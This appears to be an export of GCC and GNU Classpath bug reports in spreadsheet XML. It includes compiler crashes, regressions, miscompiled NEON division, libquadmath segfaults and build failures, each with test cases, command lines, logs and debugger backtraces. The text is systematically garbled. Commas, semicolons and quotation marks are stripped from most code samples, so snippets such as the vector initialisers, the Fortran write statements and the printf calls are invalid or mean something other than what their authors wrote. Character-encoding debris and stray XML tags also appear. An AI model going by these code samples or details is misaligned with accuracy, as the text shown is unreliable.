http://gcc.gnu.org/ml/gcc-testresults/2003-01/msg00135.html
The failures appear to have started showing immediately when the testcase was checked in.
In the logfile I see:
simd-5.c: In function `main':
simd-5.c:12: error: unable to find a register to spill in class `GENERAL_REGS'
simd-5.c:12: error: this is the insn:
(insn 52 51 53 0 62d440 (set (reg:SI 1 %g1 [141])
        (subreg:SI (reg:V2SI 112) 4)) 51 {*movsi_insn} (nil)
    (expr_list:REG_DEAD (reg:V2SI 112)
        (nil)))
simd-5.c:12: internal compiler error: in spill_failure at reload1.c:1922
[...]
FAIL: gcc.c-torture/compile/simd-5.c  -O0
Release:
gcc version 3.4 20030105 (experimental)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
Target sparc-sun-solaris2.7 and compile simd-5.i with:
cc1 -fpreprocessed simd-5.i -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -dumpbase simd-5.c -m64 -auxbase-strip /teal/tmpdisk/ghazi/gcc-testing/34/build/gcc/testsuite/simd-5.o -O0 -w -version -o simd-5.s
# 1 /teal/tmpdisk/ghazi/gcc-testing/34/egcc-CVS20030105/gcc/testsuite/gcc.c-torture/compile/simd-5.c
# 1 
# 1 
# 1 /teal/tmpdisk/ghazi/gcc-testing/34/egcc-CVS20030105/gcc/testsuite/gcc.c-torture/compile/simd-5.c
main(){
 __attribute__((vector_size(8))) int c
__attribute__((vector_size(8))) int a = {1 -1}
__attribute__((vector_size(8))) int b = {2 -2}
c = -a + b*b*(-1LL)
 printf(result is %llx\n (long long)c)
}</t>
  </si>
  <si>
    <t>GCC-18009</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in vect_transform_stmt at tree-vectorizer.c:2625 (testcase included)</t>
  </si>
  <si>
    <t>This testcase:
void Parse_UV_Vect (double UV_Vect[2])
{
   double Express[4]
   int Terms
   for(Terms=0Terms&lt;2Terms++)
     UV_Vect[Terms]=Express[Terms]
}
 with 'gcc -O2 -march=pentium4 -ftree-vectorize -S err.cpp' ICEs:
err.cpp: In function `void Parse_UV_Vect(double*)':
err.cpp:1: internal compiler error: in vect_transform_stmt at
tree-vectorizer.c:2625
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-58745</t>
  </si>
  <si>
    <t>[4.9 Regression] bootstrap failure</t>
  </si>
  <si>
    <t>g++ -c  -DIN_GCC_FRONTEND -g -O2 -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -Icp -I../../gcc/gcc -I../../gcc/gcc/cp -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/data/vjoost/gnu/gcc_trunk/obj/./gmp -I/data/vjoost/gnu/gcc_trunk/gcc/gmp -I/data/vjoost/gnu/gcc_trunk/obj/./mpfr -I/data/vjoost/gnu/gcc_trunk/gcc/mpfr -I/data/vjoost/gnu/gcc_trunk/gcc/mpc/src  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/bid -I../libdecnumber -I../../gcc/gcc/../libbacktrace -DCLOOG_INT_GMP -I/data/vjoost/gnu/gcc_trunk/obj/./cloog/include -I/data/vjoost/gnu/gcc_trunk/gcc/cloog/include -I../gcc/cloog/include  -I/data/vjoost/gnu/gcc_trunk/obj/./isl/include -I/data/vjoost/gnu/gcc_trunk/gcc/isl/include  -o cp/pt.o -MT cp/pt.o -MMD -MP -MF cp/.deps/pt.TPo ../../gcc/gcc/cp/pt.c
../../gcc/gcc/cp/pt.c: In function â€˜tree_node* tsubst(tree tree tsubst_flags_t tree)â€™:
../../gcc/gcc/cp/pt.c:12105:70: error: invalid conversion from â€˜intâ€™ to â€˜tree_codeâ€™ [-fpermissive]</t>
  </si>
  <si>
    <t>GCC-25767</t>
  </si>
  <si>
    <t>g++.dg/lookup/builtin1.C (and a couple others) fails on i686-darwin</t>
  </si>
  <si>
    <t>g++.dg/lookup/builtin1.C fails because -multiply_defined suppress is not passed so we get warnings:
/usr/bin/ld: warning multiple definitions of symbol _abort
/var/tmp//ccGf0er9.o definition of _abort in section (__TEXT__text)
/usr/lib/libm.dylib(abort.So) definition of _abort
-----
g++.exp should change to:
    if { [string match *-*-darwin* $target_triplet] } {
        lappend ALWAYS_CXXFLAGS ldflags=-multiply_defined suppress
       }</t>
  </si>
  <si>
    <t>GCC-47642</t>
  </si>
  <si>
    <t>real(kind=16) - libquadmath - segfault on amd64 FreeBSD</t>
  </si>
  <si>
    <t>BUZI&gt; uname -a
FreeBSD zzz 9.0-CURRENT FreeBSD 9.0-CURRENT #4 r217412: Fri Jan 14 22:09:57 GMT 2011     root@zzz:/usr/obj/usr/src/sys/BUZI  amd64
BUZI&gt; cat tmp.f90
        program z
        implicit none
        real(kind=16) :: q
        q=1.0e48_16
        write(**)q
        write(**)nearest(q1.0)
        write(**)nearest(q1.0)-q
        end program z
BUZI&gt; gfortran46 -Wl-rpath=/usr/local/lib/gcc46 tmp.f90
BUZI&gt; ./a.out
  1.00000000000000000000000000000000000E+0048
  1.00000000000000000000000000000000014E+0048
   140737488355328.00000000000000000000      
BUZI&gt;
This is fine however changing the constant to 1e38 gives segfault:
BUZI&gt; cat tmp.f90
        program z
        implicit none
        real(kind=16) :: q
        q=1.0e38_16
        write(**)q
        write(**)nearest(q1.0)
        write(**)nearest(q1.0)-q
        end program z
BUZI&gt; gfortran46 -Wl-rpath=/usr/local/lib/gcc46 tmp.f90
BUZI&gt; ./a.out
  1.00000000000000000000000000000000000E+0038
Segmentation fault (core dumped)
BUZI&gt; 
Same with 1e39:
BUZI&gt; cat tmp.f90
        program z
        implicit none
        real(kind=16) :: q
        q=1.0e39_16
        write(**)q
        write(**)nearest(q1.0)
        write(**)nearest(q1.0)-q
        end program z
BUZI&gt; gfortran46 -Wl-rpath=/usr/local/lib/gcc46 tmp.f90
BUZI&gt; ./a.out
  1.00000000000000000000000000000000000E+0039
Segmentation fault (core dumped)
BUZI&gt; 
Then 1e29 works correct again
BUZI&gt; cat tmp.f90
        program z
        implicit none
        real(kind=16) :: q
        q=1.0e29_16
        write(**)q
        write(**)nearest(q1.0)
        write(**)nearest(q1.0)-q
        end program z
BUZI&gt; gfortran46 -Wl-rpath=/usr/local/lib/gcc46 tmp.f90
BUZI&gt; ./a.out
   100000000000000000000000000000.00000      
   100000000000000000000000000000.00002      
  1.52587890625000000000000000000000000E-0005
BUZI&gt; 
From debugger:
BUZI&gt; gdb a.out a.out.core
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as amd64-marcel-freebsd...(no debugging symbols found)...
Core was generated by `a.out'.
Program terminated with signal 11 Segmentation fault.
Reading symbols from /usr/local/lib/gcc46/libgfortran.so.3...done.
Loaded symbols for /usr/local/lib/gcc46/libgfortran.so.3
Reading symbols from /lib/libm.so.5...done.
Loaded symbols for /lib/libm.so.5
Reading symbols from /usr/local/lib/gcc46/libgcc_s.so.1...done.
Loaded symbols for /usr/local/lib/gcc46/libgcc_s.so.1
Reading symbols from /usr/local/lib/gcc46/libquadmath.so.0...done.
Loaded symbols for /usr/local/lib/gcc46/libquadmath.so.0
Reading symbols from /lib/libc.so.7...done.
Loaded symbols for /lib/libc.so.7
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
#0  0x00000008010ba0ae in memset () from /lib/libc.so.7
(gdb) (gdb) bt
#0  0x00000008010ba0ae in memset () from /lib/libc.so.7
#1  0x0000000800d98a27 in quadmath_flt128tostr (s=0x7fffffffd250 '0' ... 
    size=47 n=37 x=Variable x is not available.
) at ../.././../gcc-4.6-20110205/libquadmath/quadmath_io.c:95
#2  0x3030303030303030 in ?? ()
#3  0x3030303030303030 in ?? ()
#4  0x3030303030303030 in ?? ()
#5  0x3030303030303030 in ?? ()
#6  0x3030303030303030 in ?? ()
#7  0x3030303030303030 in ?? ()
*skip lots of identical lines*
#968 0x3030303030303030 in ?? ()
#969 0x3030303030303030 in ?? ()
#970 0x3030303030303030 in ?? ()
#971 0x3030303030303030 in ?? ()
#972 0x3030303030303030 in ?? ()
#973 0x3030303030303030 in ?? ()
---Type  to continue or q  to quit---
#974 0x3030303030303030 in ?? ()
Cannot access memory at address 0x7ffffffff000
(gdb)</t>
  </si>
  <si>
    <t>GCC-16626</t>
  </si>
  <si>
    <t>[4.0 regression] [arm] thumb branch out of range</t>
  </si>
  <si>
    <t>I've got branch out of range error from the assembler 
when I tried to compile the attached testcase (from CSiBE).
Command line (arm-elf-gcc (GCC) 3.5.0 20040718):
arm-elf-gcc -mthumb -c -O2 -o foo.o foo.i
Output:
/tmp/ccM0KWgC.s: Assembler messages:
/tmp/ccM0KWgC.s:906: Error: branch out of range</t>
  </si>
  <si>
    <t>GCC-71958</t>
  </si>
  <si>
    <t>x86_64-w64-mingw32 ICE when '-mx32' is used</t>
  </si>
  <si>
    <t>This code:
void
bar(int v)
{
    short w[v]
}
produces the following error if compiled using gcc-6.1.0:
bar.c: In function 'bar':
bar.c:5:8: internal compiler error: in copy_to_mode_reg at explow.c:601
  short w[v]
        ^
But compiled ok using this versions: 4.8.3 4.9.2 5.1.0 5.2.0 5.3.0 5.4.0</t>
  </si>
  <si>
    <t>GCC-23621</t>
  </si>
  <si>
    <t>gcj-dbtool aborts on m68k-linux</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/312830]
4.0.2 20050821 binutils-2.16.1 glibc-2.3.5 (crest/unstable).
On Sat Jun 11 2005 at 01:15:30AM +0200 Christian T. Steigies wrote:
&gt; 
&gt; Running it from gdb now it seems to take a LOT longer...
Starting program: /usr/bin/gcj-dbtool-4.0 -n /var/lib/gcj-4.0/classmap.db
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 4569)]
[New Thread 32769 (LWP 4591)]
[New Thread 16386 (LWP 4592)]
Exception during runtime initialization
Program received signal SIGABRT Aborted.
[Switching to Thread 16384 (LWP 4569)]
0xc1095c1e in kill () from /lib/libc.so.6
(gdb) bt
#0  0xc1095c1e in kill () from /lib/libc.so.6
#1  0xc0ffed34 in pthread_kill () from /lib/libpthread.so.0
#2  0xc0ffefae in raise () from /lib/libpthread.so.0
#3  0xc1095a9a in raise () from /lib/libc.so.6
#4  0xc1096a46 in abort () from /lib/libc.so.6
#5  0xc0715fc2 in _Jv_Throw (value=0xc122cf00) at
../../../src/libjava/exception.cc:113
#6  0xc074b0d6 in java.lang.VMClassLoader.transformException(java.lang.Class
java.lang.Throwable) (clazz=0xc0c29308
    x=0xc122cf00) at ../../../src/libjava/java/lang/VMClassLoader.java:131
#7  0xc072b174 in java::lang::VMClassLoader::resolveClass (klass=0xc0c29308)
    at ../../../src/libjava/java/lang/natVMClassLoader.cc:49
#8  0xc072490c in java::lang::Class::initializeClass (this=0xc0c29308) at
../../../src/libjava/java/lang/natClass.cc:728
#9  0xc070b50e in _Jv_AllocObjectNoFinalizer (klass=0xc0c29308) at Class.h:579
#10 0xc09eb58c in java.lang.ConcreteProcess$ProcessManager.finit$()
(this=0xc11ad900) at java/lang/ConcreteProcess.java:42
#11 0xc09eb5f8 in
java.lang.ConcreteProcess$ProcessManager.ConcreteProcess$ProcessManager()
(this=0xc11ad900)
    at java/lang/ConcreteProcess.java:35
#12 0xc09ebf9c in java.lang.ConcreteProcess.ConcreteProcess(java.lang.String[]
java.lang.String[] java.io.File) (
    this=0xc11ad940 progarray=0xc1226078 envp=0x0 dir=0x0) at
java/lang/ConcreteProcess.java:376
#13 0xc072709e in java::lang::Runtime::execInternal (this=0xc11c1bd0
cmd=0xc1226078 env=0x0 dir=0x0)
    at ../../../src/libjava/java/lang/natRuntime.cc:644
#14 0xc073f64c in java.lang.Runtime.exec(java.lang.String[] java.lang.String[]
java.io.File) (this=0xc11c1bd0
    cmd=0xc1226078 env=0x0 dir=0x0) at
../../../src/libjava/java/lang/Runtime.java:539
#15 0xc073f5b4 in java.lang.Runtime.exec(java.lang.String[]) (this=0xc11c1bd0
cmd=0xc1226078)
    at ../../../src/libjava/java/lang/Runtime.java:491
#16 0xc07a599e in gnu.gcj.runtime.NameFinder.NameFinder() (this=0xc122beb0)
    at ../../../src/libjava/gnu/gcj/runtime/NameFinder.java:131
#17 0xc074c2ec in java.lang.VMThrowable.getStackTrace(java.lang.Throwable)
(this=0xc1225bb0 t=0xc122cf90)
    at ../../../src/libjava/java/lang/VMThrowable.java:98
#18 0xc074ad20 in java.lang.Throwable.getStackTrace() (this=0xc122cf90)
    at ../../../src/libjava/java/lang/Throwable.java:526
#19 0xc074aae0 in java.lang.Throwable.stackTraceString() (this=0xc122cf90)
    at ../../../src/libjava/java/lang/Throwable.java:421
#20 0xc074acac in java.lang.Throwable.printStackTrace(java.io.PrintStream)
(this=0xc122cf90 s=0xc11c2920)
    at ../../../src/libjava/java/lang/Throwable.java:361
#21 0xc074a92c in java.lang.Throwable.printStackTrace() (this=0xc122cf90)
    at ../../../src/libjava/java/lang/Throwable.java:350
#22 0xc070c50a in _Jv_RunMain (vm_args=0x0 klass=0x800073ce name=0x0 argc=3
argv=0xeffff8a4 is_jar=Variable is_jar is not available.
)
    at ../../../src/libjava/prims.cc:1345
#23 0xc070c58e in _Jv_RunMain (klass=0x800073ce name=0x0 argc=3
argv=0xeffff8a4 is_jar=The value of variable 'is_jar' is distributed across several
locations and GDB cannot access its value.
)
    at ../../../src/libjava/prims.cc:1364
#24 0xc070c5b0 in JvRunMain (klass=0x800073ce argc=3 argv=0xeffff8a4) at
../../../src/libjava/prims.cc:1370
#25 0x800025fa in ?? ()
#26 0x800073ce in data_start ()
#27 0x00000003 in ?? ()
#28 0xeffff8a4 in ?? ()
#29 0xeffff880 in ?? ()
#30 0xc1086f18 in __libc_start_main () from /lib/libc.so.6
#31 0xc1086f18 in __libc_start_main () from /lib/libc.so.6
#32 0x80002542 in ?? ()</t>
  </si>
  <si>
    <t>GCC-32761</t>
  </si>
  <si>
    <t>[4.3 Regression] build broke: var_tracking loses track of register elimination crashes in find_src_set_src on parallel set</t>
  </si>
  <si>
    <t>Build for cris-axis-elf broke with a change in the range 126627:126630 of which the var_tracking patch is the only suspect broke build for cris-axis-elf:
/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/ -nostdinc -B/tmp/hpautotest-gcc1/cr\
is-elf/gccobj/cris-elf/v10/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v10/newlib/targ-include -isystem /tmp/h\
pautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris\
-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-inc\
lude  -march=v10 -mbest-lib-options -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.15.0\ -DPACKAGE\
_STRING=\newlib\ 1.15.0\ -DPACKAGE_BUGREPORT=\\  -I. -I/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib -O2 -DHAVE_RENAME -D_USE_W\
RITE -DCOMPACT_CTYPE -fno-builtin      -O2 -g -O2   -march=v10 -mbest-lib-options -c -o lib_a-mprec.o `test -f 'mprec.c' || echo \
'/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/'`mprec.c
/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/mprec.c: In function '__d2b':
/tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/mprec.c:905: internal compiler error: Segmentation fault
I had a look with gdb to see if I could spot anything trivial
(needed to recompile var-tracking with CFLAGS=-g to get a debuggable cc1):
Program received signal SIGSEGV Segmentation fault.
0x00000000007fd943 in find_src_set_src (set=0xbecaf8 loc=0x2ab48c49cca0 insn=0x2ab48c493d20)
    at /tmp/hpautotest-gcc1/gcc/gcc/var-tracking.c:1865
1865      if (REG_P (src))
(gdb) p insn
$1 = (rtx) 0x2ab48c493d20
(gdb) pr
(insn 200 22 25 2 /tmp/hpautotest-gcc1/gcc/newlib/libc/stdlib/mprec.c:787 (parallel [
            (set (mem/c/i:SI (plus:SI (reg/f:SI 14 sp)
                        (const_int 28 [0x1c])) [7 z+0 S4 A16])
                (reg:SI 13 r13 [orig:34 z.37 ] [34]))
            (set (reg/f:SI 3 r3 [93])
                (plus:SI (reg/f:SI 14 sp)
                    (const_int 28 [0x1c])))
        ]) 25 {*mov_sidesisf_mem} (nil))
(gdb) p loc
$2 = (rtx) 0x2ab48c49cca0
(gdb) pr
(mem/c/i:SI (plus:SI (reg/f:SI 18 faked_ap)
        (const_int -12 [0xfffffffffffffff4])) [7 z+0 S4 A16])
It looks as if find_src_set_src encounters a sp-relative set but expects the original non-eliminated fp-relative set.  For plain single_set sets it uses that and apparently copes with a sp-relative setting but for a parallel set it looks it can't match the set and so src remains NULL hence the REG_P causes a SEGV.  I'm not sure if the method of finding the loc in the set is at fault or if the bug is earlier and both the loc and the SET_DEST should be equally eliminated at the time of the call.
I'm attaching the preprocessed mprec.i repeat with cc1 -O2 -g &lt; mprec.i for
a --target=cris-axis-elf.</t>
  </si>
  <si>
    <t>GCC-13648</t>
  </si>
  <si>
    <t>[tree-ssa] [merge] offsetof() with a nested struct member fails to compile in a constant-expression</t>
  </si>
  <si>
    <t>This appears to be a new regression on the tree-ssa branch.  Writing:
const int i = offsetof(A b.c)
gives this error:
error: `.' cannot appear in a constant-expression
The problem also appears to be C++-specific.</t>
  </si>
  <si>
    <t>GCC-1276</t>
  </si>
  <si>
    <t>Cannot cast to inner class</t>
  </si>
  <si>
    <t xml:space="preserve">From: Mark Wielaard 
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: Re: gcj/257 (workaround)
Date: Fri 14 Jul 2000 14:37:51 +0200
 http://sources.redhat.com/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=257&amp;database=java
 As a workaround you can cast to (B$C) which is accepted by gcj.
 (But not by jikes and it seems wrong that gcj accepts it.)
</t>
  </si>
  <si>
    <t>GCC-6774</t>
  </si>
  <si>
    <t>printf(%lld) prints bad values</t>
  </si>
  <si>
    <t># include 
int main(int c char *argv[])
{
   long long   i
   long long   n
   for (i=0LL i&lt;63LL i++)
      {
      n = 1LL &lt;&lt; i
      printf(1 &lt;&lt; %d = %lld\n i n)
      }
   return 0
}
%lld is giving 64 bit results for i = 32.
Release:
g++ or g++3
Environment:
Red Hat Linux on Intel
Mandrake Linux on Intel
How-To-Repeat:
Execute above program.</t>
  </si>
  <si>
    <t>GCC-7691</t>
  </si>
  <si>
    <t>--enable-cxx-flags configure option broken</t>
  </si>
  <si>
    <t>The --enable-cxx-flags option doesn't work even using the example from the manual:
  --enable-cxx-flags='-fvtable-gc -fomit-frame-pointer -ansi'
Configure succeeds but a subsequent make fails.
Release:
GCC 3.2
Environment:
Replicated on Red Hat Linux 7.2 and on Cygwin running on Windows 2000
How-To-Repeat:
tar xfj gcc-3.2.tar.bz2
mkdir gccbuild
cd gccbuild
../gcc-3.2/configure --enable-cxx-flags='-fvtable-gc -fomit-frame-pointer -ansi'
make</t>
  </si>
  <si>
    <t>7zbuodeyr001</t>
  </si>
  <si>
    <t>GCC-14858</t>
  </si>
  <si>
    <t>[3.3 Regression] incorrect interpretation of elaborate type specifiers</t>
  </si>
  <si>
    <t>The following correct fragment causes a compilation error:
// begin of fragment
namespace n {
        struct S {}
        extern void S ()
}
struct n::S s
// end of fragment
### command line and output
&gt; g++ -v -c el.cc
Using built-in specs.
Configured with: FreeBSD/i386 system compiler
Thread model: posix
gcc version 3.3.3 [FreeBSD] 20031106
 /usr/libexec/cc1plus -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -
D__GNUC_PATCHLEVEL__=3 -D_LONGLONG el.cc -D__GNUG__=3 -quiet -dumpbase el.cc -
auxbase el -version -o /var/tmp//ccGW1KHy.s
GNU C++ version 3.3.3 [FreeBSD] 20031106 (i386-undermydesk-freebsd)
        compiled by GNU C version 3.3.3 [FreeBSD] 20031106.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring duplicate directory /usr/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.3
 /usr/include/c++/3.3/backward
 /usr/include
End of search list.
el.cc:8: error: `n' does not have a class or union named `S'
el.cc:8: error: aggregate `S s' has incomplete type and cannot be defined
el.cc:8: error: storage size of `s' isn't known
&gt; ### end of command output
It must be a regression issue as it compiles fine with gcc 2.x</t>
  </si>
  <si>
    <t>GCC-78612</t>
  </si>
  <si>
    <t>Invalid double returned from if statement containing NEON division</t>
  </si>
  <si>
    <t>Compile the program with options -fPIC -O2 -mfpu=neon for ARM:
#include 
typedef double TFLOAT
TFLOAT GetValue()
{
  static const TFLOAT val[6]={0 200 300 400 500 600}
  static int k = 0
  TFLOAT tmp = val[k]
  k = (k+1) % 6
  return tmp
}
TFLOAT Inv(TFLOAT _d)
{    
  if (_d - 0.000001 &gt; 0)
  {
      return 1.0f / _d
  }
  else
  {
      return 0.0f
  }
}
int main(int argc char* argv[])
{
  std::cout &lt;&lt; Inv(GetValue()) &lt;&lt; std::endl
  std::cout &lt;&lt; Inv(GetValue()) &lt;&lt; std::endl
  std::cout &lt;&lt; Inv(GetValue()) &lt;&lt; std::endl
  std::cout &lt;&lt; Inv(GetValue()) &lt;&lt; std::endl
  return 0
}
Output is:
0
inf
inf
inf
Must be:
0
0.005
0.00333333
0.0025
If you use float for TFLOAT or use -mfpu=vfpv3 results will be valid.
About used g++:
arm-cortexa9-linux-gnueabi-g++ -v
Using built-in specs.
COLLECT_GCC=arm-cortexa9-linux-gnueabi-g++
COLLECT_LTO_WRAPPER=/home/OSELAS.Toolchain-2011.02.0/arm-cortexa9-linux-gnueabi/gcc-linaro-4.5-2011.02
-0-glibc-2.13-binutils-2.21-kernel-2.6.36-sanitized/bin/../libexec/gcc/arm-cortexa9-linux-gnueabi/4.5.
2/lto-wrapper
Target: arm-cortexa9-linux-gnueabi
Configured with: /home/adam/Downloads/OSELAS.Toolchain-2011.02.0/platform-arm-cortexa9-linux-gnueabi-g
cc-linaro-4.5-2011.02-0-glibc-2.13-binutils-2.21-kernel-2.6.36-sanitized/build-cross/gcc-linaro-4.5-20
11.02-0/configure --target=arm-cortexa9-linux-gnueabi --with-sysroot=/opt/OSELAS.Toolchain-2011.02.0/a
rm-cortexa9-linux-gnueabi/gcc-linaro-4.5-2011.02-0-glibc-2.13-binutils-2.21-kernel-2.6.36-sanitized/sy
sroot-arm-cortexa9-linux-gnueabi --disable-multilib --with-float=softfp --with-fpu=neon --with-cpu=cor
tex-a9 --enable-__cxa_atexit --disable-sjlj-exceptions --disable-nls --disable-decimal-float --disable
-fixed-point --disable-win32-registry --enable-symvers=gnu --with-pkgversion=OSELAS.Toolchain-2011.02.
0 --with-system-zlib --with-gmp=/home/adam/Downloads/OSELAS.Toolchain-2011.02.0/platform-arm-cortexa9-
linux-gnueabi-gcc-linaro-4.5-2011.02-0-glibc-2.13-binutils-2.21-kernel-2.6.36-sanitized/sysroot-host -
-with-mpfr=/home/adam/Downloads/OSELAS.Toolchain-2011.02.0/platform-arm-cortexa9-linux-gnueabi-gcc-lin
aro-4.5-2011.02-0-glibc-2.13-binutils-2.21-kernel-2.6.36-sanitized/sysroot-host --prefix=/opt/OSELAS.T
oolchain-2011.02.0/arm-cortexa9-linux-gnueabi/gcc-linaro-4.5-2011.02-0-glibc-2.13-binutils-2.21-kernel
-2.6.36-sanitized --enable-languages=cc++ --enable-threads=posix --enable-c99 --enable-long-long --en
able-libstdcxx-debug --enable-profile --enable-shared --disable-libssp --enable-checking=release
Thread model: posix
gcc version 4.5.2 (OSELAS.Toolchain-2011.02.0)</t>
  </si>
  <si>
    <t>kudakov</t>
  </si>
  <si>
    <t>GCC-59802</t>
  </si>
  <si>
    <t>excessive compile time in RTL optimizers (loop unswitching CPROP)</t>
  </si>
  <si>
    <t>Created attachment 31830
gzipped C++ source code
I just compiled the attached code with gcc trunk 20140112 on a x86_64
box with flag -O3 and it took over eight minutes.  Using only -O2 took
a more reasonable 2 minutes 38 seconds.
For reference the redhat version of gcc 482 took 2 minutes 32 seconds
for -O3 and 2 minutes 11 seconds for -O2.
I can see that for -O2 trunk is using about 30 seconds more CPU time
which is fine but for -O3 over 5 minutes more.
I tried flag -ftime-report and here are all the times &gt; 1%.
Execution times (seconds)
 phase opt and generate  : 465.18 (100%) usr   0.50 (57%) sys 468.04 (100%) wall  130935 kB (59%) ggc
 loop invariant motion   :  22.50 ( 5%) usr   0.01 ( 1%) sys  22.85 ( 5%) wall       2 kB ( 0%) ggc
 loop unswitching        : 302.37 (65%) usr   0.01 ( 1%) sys 303.82 (65%) wall      72 kB ( 0%) ggc
 CPROP                   :  85.02 (18%) usr   0.09 (10%) sys  85.52 (18%) wall    4445 kB ( 2%) ggc
 TOTAL                 : 466.12             0.88           469.55             221219 kB
Suggest code rework for trunk for -O3 maybe in the area of loop unswitching.
This bug may be a duplicate of bug 38518</t>
  </si>
  <si>
    <t>GCC-22352</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in lookup_member</t>
  </si>
  <si>
    <t>template 
class s
{
  typedef int d
  template 
    friend class t
}
s t1</t>
  </si>
  <si>
    <t>GCC-80177</t>
  </si>
  <si>
    <t>wrong fixit hint for misspelled static_assert: __cpp_static_assert</t>
  </si>
  <si>
    <t>In the ill-formed test case below GCC suggests to replace the misspelled static_assert with the __cpp_static_assert feature test macro rather than with the static_assert keyword.  Using the feature test macro here would be incorrect  to the hint should suggest the latter.
(I wonder if there is a way to have the  algorithm prefer non-reserved names over reserved ones.  Also it would be nice though I suspect difficult if the algorithm could prefer names with the right type.  E.g. prefer a function over a literal where a the misspelled name looks like it's being used as a function.)
$ cat a.C &amp;&amp; gcc -S -Wall -Wextra -Wpedantic a.C
void f ()
{
  static_assertion (1 == 0 1 == 0)
}
a.C: In function â€˜void f()â€™:
a.C:3:3: error: â€˜static_assertionâ€™ was not declared in this scope
   static_assertion (1 == 0 1 == 0)
   ^~~~~~~~~~~~~~~~
a.C:3:3: note: suggested alternative: â€˜__cpp_static_assertâ€™
   static_assertion (1 == 0 1 == 0)
   ^~~~~~~~~~~~~~~~
   __cpp_static_assert</t>
  </si>
  <si>
    <t>GCC-71806</t>
  </si>
  <si>
    <t>PowerPC -mcpu=power9 enables __float128 without an explicit -mfloat128</t>
  </si>
  <si>
    <t>The macro ISA_3_0_MASKS_SERVER includes OPTION_MASK_FLOAT128_HW which enables the -mfloat128 option.  The -mfloat128 option being on by default means that some of the libraries (libstdc++ libquadmath etc.) will add code for IEEE 128-bit floating point.
Until all of the libraries are updated to support IEEE 128-bit the -mcpu=power9 support should not enable IEEE 128-bit floating point support (either hardware or software).
In addition if you configure the compiler with the --with-cpu=power9 option it should not enable IEEE 128-bit floating point support by default.
If the user uses -mcpu=power9 -mfloat128 it should enable the hardware support that is available in ISA 3.0.</t>
  </si>
  <si>
    <t>CLASSPATH-24723</t>
  </si>
  <si>
    <t>gjdoc doesn't resolve links to the java library</t>
  </si>
  <si>
    <t>Hi
gjdoc doesn't resolve some links to the standard java libary or libraries specified with the -classpath option. gjdoc prints also some in my opinion incorrect warnings.
Simple class tested with gjdoc -link http://java.sun.com/j2se/1.4.2/docs/api TestStandardLibs.java:
import java.util.LinkedList
public class TestStandardLibs {
  public class Test1 {}
  public class Test2 extends Object {}
  public class Test3 extends java.lang.Object {}
  public class Test4 extends LinkedList {}
  public class Test5 extends java.util.HashMap {}
}
Warnings:
WARNING: Cannot locate class java.lang.Object referenced in class TestStandardLibs.Test1
WARNING: Cannot locate class Object referenced in class TestStandardLibs.Test2
WARNING: Error while loading class LinkedList
WARNING: Cannot locate class java.util.HashMap referenced in class TestStandardLibs.Test5
WARNING: Cannot locate class java.util.LinkedList referenced in class TestStandardLibs.Test5
Links:
Test1: work!
Test2: failed!
Test3: work!
Test4: failed!
Test5: work!</t>
  </si>
  <si>
    <t>GCC-45219</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: SIGSEGV in dominated_by_p (dominance.c:973) with -O2 -fprofile-generate</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O2 -fprofile-generate testcase.c
Valgrind output:
==8227== Invalid read of size 8
==8227==    at 0x60BB4B: dominated_by_p (dominance.c:973)
==8227==    by 0x950317: dse_enter_block (tree-ssa-dse.c:198)
==8227==    by 0xF18CC6: walk_dominator_tree (domwalk.c:188)
==8227==    by 0x94F9F2: tree_ssa_dse (tree-ssa-dse.c:429)
==8227==    by 0x7BD50B: execute_one_pass (passes.c:1564)
==8227==    by 0x7BD7A4: execute_pass_list (passes.c:1619)
==8227==    by 0x7BD7B6: execute_pass_list (passes.c:1620)
==8227==    by 0x8FF355: tree_rest_of_compilation (tree-optimize.c:452)
==8227==    by 0xAB6505: cgraph_expand_function (cgraphunit.c:1643)
==8227==    by 0xAB9389: cgraph_optimize (cgraphunit.c:1722)
==8227==    by 0xAB997A: cgraph_finalize_compilation_unit (cgraphunit.c:1185)
==8227==    by 0x4DF88E: c_write_global_declarations (c-decl.c:9698)
==8227==  Address 0x20 is not stack'd malloc'd or (recently) free'd
==8227== 
testcase.c: In function 'foo':
